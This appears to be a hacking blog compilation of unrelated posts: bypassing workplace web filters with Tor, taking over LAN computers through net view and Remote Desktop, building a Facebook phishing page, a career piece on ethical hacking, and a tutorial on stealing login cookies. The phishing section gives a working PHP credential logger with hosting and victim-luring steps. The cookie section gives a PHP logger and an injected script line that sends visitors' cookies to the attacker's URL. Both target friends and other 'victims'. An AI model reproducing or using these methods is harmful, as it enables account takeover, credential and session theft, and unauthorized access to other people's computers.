How to Hack Cybercam or Websense

Hello Friends, today i am going to explain you How to hack cyberoam websense and all other security firewalls that college, institutions, offices use to block websites at their respective places. Most of my users have asked me about that how to access blocked websites in their college and offices, i have explained this earlier also but those loopholes are now fixed and those methods to hack cyberoam and websense doesn’t work effectively now and also hacking through proxy is quite tedious task as we have to search for working proxy websites which in itself is a very tedious task, and these doesn’t work always. But the method that i will explain today is really awesome and doesn’t require much task and thus its quite easy and the most important its 100% working. So friends read on for detailed hack….
For hacking Cyberoam or Websense  you must know How cyberoam and websense works? If you know how they works then you can easily find flaws in that and hack it very easily.
Cyberoam is a 8 layer hardware firewall that offers stateful and deep packet inspection for network and web applications and user based identity security. Thus the firewall is quite secured. Now how we can hack that 8 layer security its the main important question here, as i have mentioned above that main working and blocking of any website or application by cyberoam is basically done at deep packet inspection step, now here the flaw in any security firewall lies, also in case of cyberoam and websense too. They block all websites by parsing their content and if their content contains the restricted keywords then they block that websites. They also use category blocking which also works on same concept. The flaw is with websites that uses SSL feature, the websites that contains SSL lock i.e. the websites that uses https are not blocked by them. They have to block these websites manually which is a very hectic task and believe me nobody blocks them.
So the proxy websites that uses https i.e. SSL proxies are also not blocked by these websites. 
Only those proxies are blocked which are known or being heavily used. But the tool that i give you create SSL proxies by itself that means its proxies cannot be blocked. So friends this tool rocks..:P :)


Things that we need to hack cyberoam, websense and any such such hardware firewall:
1. TOR browser ( a anonymous web browser like Mozilla which has inbuilt proxy finder that bypasses the websites easily that are being blocked by cyberoam or websense).
2. A USB or pendrive ( where you will keep the portable version of TOR browser)
3. If USB drives are disabled we will use different drive for its installation. (also portable version of TOR can be executed from any place).


Steps to hack Cyberoam:
1. Download the TOR web browser.
     To download TOR browser: CLICK HERE

2. Now install the TOR web browser. In case of portable version it will extract.
    For Installation and usage Instructions visit here: CLICK HERE

3. Now open the TOR browser and start surfing your favorite website like facebook, orkut, gmail ..everything at you office….

4. That’s all the hack. I hope you all have liked it.

For such hacks keep visiting…and subscribe our posts, if you don’t wanna miss any such hack….

If you Have any Queries ask me in form of comments. If you like this please comment :)
Thanks for Reading…

Hack computer in Computer Shop

How To Hack & Access Same LAN Computers ?
If you are working in Office / Colleges and want to hack your friends & college mate PC then here is a trick.
First Step press win+ RGo to Run> Type Cmd

now type command net view
It will be look as below
C:\>net view
Server Name            Remark
———————————————–
\\xyz
\\abc
Here you can get all the names of all the computers machine names which connect with your LAN.
Now you got the name.  Lets start hacking into the systems.
After you get server name now type tracert command for knowing IP of the victim machine.
Example: C:\> tracert xyz
Here you get the IP address of the XYZ computer machine.
Now go to windows start button and type Remote Desktop Connection
After click on Remote Desktop Connection you get below image..
Now type the IP address or computer name of victim machine.
Click on Connect <-|
It will also ask administrator password which is common as usual you known about.
After few second Victim machine shown in your Computer..
Now you can access that machine to open website, files, Software’s, etc
Enjoy the trick..

How to hack Facebook with phishing page

                                                      

hacking facebook account
                                                            


As we all want to hack our friend facebook account,and want to read all his personal things.

Today i m gonna teach you how to hack a facebook account with a phishing page.



phishing:


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it’s not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting…..

FACEBOOK PHISHING….

facebook hack

                                                                         



steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.



                                          

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

facebook phishing script

                                                  

                                           

4.You will have to find a text which looks like ..

                                       action=https://www.facebook.com/login.php?login_attempt=1

5.delete all the text written in red colour and instead of it write post.php.then it will look like…

                                                 action=post.php

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .

hacking script
index


                                                   
8.Open a new notepad and save the given data with the name post.php.

<?php
header (‘Location:http://www.facebook.com/&#8217;);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, “=”);
   fwrite($handle, $value);
   fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11.I prefer u to use 000webhost because it will be easy to use.
                           

hosting website

                                              

12.You have to make a account in that ,after that it looks like a picture given below.


facebook script hosting website

                                                                          
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.

                                           
                                        

15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .


                                        
16.Now the last step click on view of index.htm it will look same as facebook page.


this is your Facebook phishing page

                                         

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                

                                        

19.Click on view now u will have your friend’s password and email id.

                                           

20.This is a simple trick to hack any Facebook password account by phishing page.

21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.


       click here to view a video tutorial with the readymade phishing pages….

note:

phishing is a illegal activity so don’t try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps….
u can hack Gmail,Yahoo,Orkut,Twitter and many more…..




                                               

Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way….

                                                           thank you….
            

How to Become an Ethical Hacker

Do viruses, DDoS attacks, or buffer overflows tickle your fancy? If so, you might consider becoming a legal hacker, aka an ethical hacker, “white hat” hacker, or penetration tester.

Businesses and government-related organizations that are serious about their network security hire ethical hackers and penetration testers to help probe and improve their networks, applications, and other computer systems with the ultimate goal of preventing data theft and fraud. You may not get the same adrenaline rush that you might with underground hacking, but you can earn a good and honest living–and not end up facing prison time, as some illegal “black hat” hackers do.
How does the job market look like for ethical hackers? Extremely good! The IT market overall continues to grow despite the current economic turmoil. Research firm Gartner estimates that worldwide enterprise IT spending grew by 5.9 percent between 2009 and 2010, to a total of $2.7 trillion. At the same time, security is becoming a more pressing concern. Gartner expects to see an increase of nearly 40 percent in spending on worldwide security services during the five-year period from 2011 to 2015, eventually surpassing $49.1 billion.
In your first years as an ethical hacker, you’ll be in a position to earn anywhere from $50,000 to $100,000 per year, depending on the company that hires you, and on your IT experience and education. With several years of professional experience, you could command $120,000 or more per year, especially if you do your own independent consulting.
You can’t just dive into an ethical hacker position, however. Without IT security experience, you won’t get very far, even with degrees and certifications. As is true for other IT jobs, employers typically want candidates who have college degrees, but related experience is king. And experience with certifications can typically take the place of some degree requirements.

Getting Started

What you need to do to get started on the road to becoming an ethical hacker depends on where you are in the IT field. If you haven’t started your IT career yet, you might even consider military service. The military offers many IT opportunities, and you get paid to go to school, even if you enlist in a part-time branch such as the National Guard or Reserves. Military service also looks good to employers that require security clearances.
Start with the basics: Earn your A+ Certification and get a tech support position. After some experience and additional certification (Network+ or CCNA), move up to a network support or admin role, and then to network engineer after a few years. Next, put some time into earning security certifications (Security+, CISSP, or TICSA) and find an information security position. While you’re there, try to concentrate on penetration testing–and get some experience with the tools of the trade. Then work toward the Certified Ethical Hacker (CEH) certification offered by the International Council of Electronic Commerce Consultants (EC-Council for short). At that point, you can start marketing yourself as an ethical hacker.
For a hacker, networking know-how is vital; but make sure that you gain experience in related areas as well. Discover and play with Unix/Linux commands and distributions. Make sure you also learn some programming–maybe C, LISP, Perl, or Java. And spend some time with databases such as SQL.

Soft Skills

Hacking isn’t all technical. It also requires so-called soft skills, just as any other IT job does. You’ll need a strong work ethic, very good problem-solving and communications skills, and the ability to say motivated and dedicated.
Ethical hackers also need street smarts, people skills, and even some talent for manipulation, since at times they need to be able to persuade others to disclose credentials, restart or shut down systems, execute files, or otherwise knowingly or unknowingly help them achieve their ultimate goal. You’ll need to master this aspect of the job, which people in the business sometimes call “social engineering,” to become a well-rounded ethical hacker.

Stay Legal!

It’s important never to engage in “black hat” hacking–that is, intruding or attacking anyone’s network without their full permission. Engaging in illegal activities, even if it doesn’t lead to a conviction, will likely kill your ethical hacking career. Many of the available jobs are with government-related organizations and require security clearances and polygraph testing. Even regular companies will perform at least a basic background check.

Becoming a Certified Ethical Hacker (CEH)

As noted earlier, becoming a Certified Ethical Hacker (CEH) involves earning the appropriate credential from the EC-Council after a few years of security-related IT experience. The certification will help you understand security from the mindset of a hacker. You’ll learn the common types of exploits, vulnerabilities, and countermeasures.
Qualification for a CEH (a vendor-neutral certification) involves mastering penetration testing, footprinting and reconnaissance, and social engineering. The course of study covers creating Trojan horses, backdoors, viruses, and worms. It also covers denial of service (DoS) attacks, SQL injection, buffer overflow, session hijacking, and system hacking. You’ll discover how to hijack Web servers and Web applications. You’ll also find out how to scan and sniff networks, crack wireless encryption, and evade IDSs, firewalls, and honeypots.
Through approved EC-Council training partners, you can take a live, five-day onsite or online training course to prepare for the CEH cert. You can generally take live online classes over five consecutive days; onsite courses typically offer the content spread over a couple weeks for locals. In addition, you can take self-paced courses and work with self-study materials (including the CEH Certified Ethical Hacker Study Guide book) with or without the training courses. The EC-Council also offers iLabs, a subscription based-service that allows you to log on to virtualized remote machines to perform exercises.
The EC-Council usually requires that you have at least two years of information-security-related work experience (endorsed by your employer) in addition to passing the exam before it will award you the official CEH certification.

How to Steal Someone’s Login Cookie Online

In this tutorial you’ll learn how to steal someones login cookie. 
Open notepad. 
There type: 
<?php 
$cookie = $_GET[‘cookie’]; 
$log = fopen( log.txt , a ); 
fwrite($log, $cookie . \n ); 
fclose($log); 
?> 
After that save is at .php. 
Than go to a site where you want to steal login cookies. 
Than make a post which should look like this: 
 
document.location = http://linkofyourphp.php?cookie= + document.cookie; 
 
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file. 
I hope that works for you.